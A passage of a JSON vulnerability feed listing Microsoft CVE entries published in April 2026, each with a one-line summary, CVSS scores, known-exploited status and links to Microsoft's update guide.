network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33120"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33822","summary":"Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33822"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33824","summary":"Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33824"],"published_time":"2026-04-14T18:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33103","summary":"Improper access control in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33103"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33104","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33104"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33114","summary":"Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33114"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33115","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33115"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33116","summary":"Loop with unreachable exit condition ('infinite loop') in .NET, .NET Framework, Visual Studio allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33116"],"published_time":"2026-04-14T18:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33099","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33099"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33100","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33100"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33101","summary":"Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33101"],"published_time":"2026-04-14T18:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32226","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32226"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33095","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33095"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33096","summary":"Out-of-bounds read in Windows HTTP.sys allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33096"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33098","summary":"Use after free in Windows Container Isolation FS Filter Driver allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33098"],"published_time":"2026-04-14T18:17:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32221","summary":"Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32221"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32222","summary":"Untrusted pointer dereference in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32222"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32223","summary":"Heap-based buffer overflow in Windows USB Print Driver allows an unauthorized attacker to elevate privileges with a physical attack.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32223"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32224","summary":"Use after free in Windows Server Update Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32224"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32225","summary":"Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32225"],"published_time":"2026-04-14T18:17:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32217","summary":"Insertion of sensitive information into log file in Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32217"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32218","summary":"Insertion of sensitive information into log file in Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32218"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32219","summary":"Double free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32219"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32220","summary":"Improper access control in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32220"],"published_time":"2026-04-14T18:17:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32214","summary":"Improper access control in Universal Plug and Play (upnp.dll) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32214"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32215","summary":"Insertion of sensitive information into log file in Windows Kernel allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32215"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32216","summary":"Null pointer dereference in Windows Redirected Drive Buffering allows an authorized attacker to deny service locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32216"],"published_time":"2026-04-14T18:17:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32201","summary":"Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":true,"propose_action":"Microsoft SharePoint Server contains an improper input validation vulnerability that allows an unauthorized attacker to perform spoofing over a network.","ransomware_campaign":"Unknown","references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-32201"],"published_time":"2026-04-14T18:17:27","vendor":"microsoft","product":"sharepoint_server","version":null},{"cve_id":"CVE-2026-32202","summary":"Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32202"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32203","summary":"Stack-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32203"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32212","summary":"Improper link resolution before file access ('link following') in Universal Plug and Play (upnp.dll) allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32212"],"published_time":"2026-04-14T18:17:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32196","summary":"Improper neutralization of input during web page generation ('cross-site scripting') in Windows Admin Center allows an unauthorized attacker to perform spoofing over a network.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32196"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32197","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32197"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32198","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32198"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32199","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32199"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32200","summary":"Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32200"],"published_time":"2026-04-14T18:17:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32190","summary":"Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32190"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32192","summary":"Deserialization of untrusted data in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32192"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32195","summary":"Stack-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32195"],"published_time":"2026-04-14T18:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32189","summary":"Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32189"],"published_time":"2026-04-14T18:17:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32188","summary":"Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32188"],"published_time":"2026-04-14T18:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32184","summary":"Deserialization of untrusted data in Microsoft High Performance Compute Pack (HPC) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32184"],"published_time":"2026-04-14T18:17:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32176","summary":"Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32176"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32178","summary":"Improper neutralization of special elements in .NET allows an unauthorized attacker to perform spoofing over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32178"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32181","summary":"Improper privilege management in Microsoft Windows allows an authorized attacker to deny service locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32181"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32183","summary":"Improper neutralization of special elements used in a command ('command injection') in Windows Snipping Tool allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32183"],"published_time":"2026-04-14T18:17:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32165","summary":"Use after free in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32165"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32167","summary":"Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32167"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32168","summary":"Improper input validation in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32168"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32171","summary":"Insufficiently protected credentials in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32171"],"published_time":"2026-04-14T18:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32162","summary":"Acceptance of extraneous untrusted data with trusted data in Windows COM allows an unauthorized attacker to elevate privileges locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32162"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32163","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32163"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32164","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32164"],"published_time":"2026-04-14T18:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32157","summary":"Use after free in Remote Desktop Client allows an unauthorized attacker to execute code over a network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32158","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32158"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32159","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32159"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32160","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32160"],"published_time":"2026-04-14T18:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32154","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32154"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32155","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32155"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32156","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an unauthorized attacker to execute code locally.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32156"],"published_time":"2026-04-14T18:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32150","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32150"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32151","summary":"Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information over a network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32151"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32152","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32152"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32153","summary":"Use after free in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32153"],"published_time":"2026-04-14T18:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32091","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Brokering File System allows an unauthorized attacker to elevate privileges 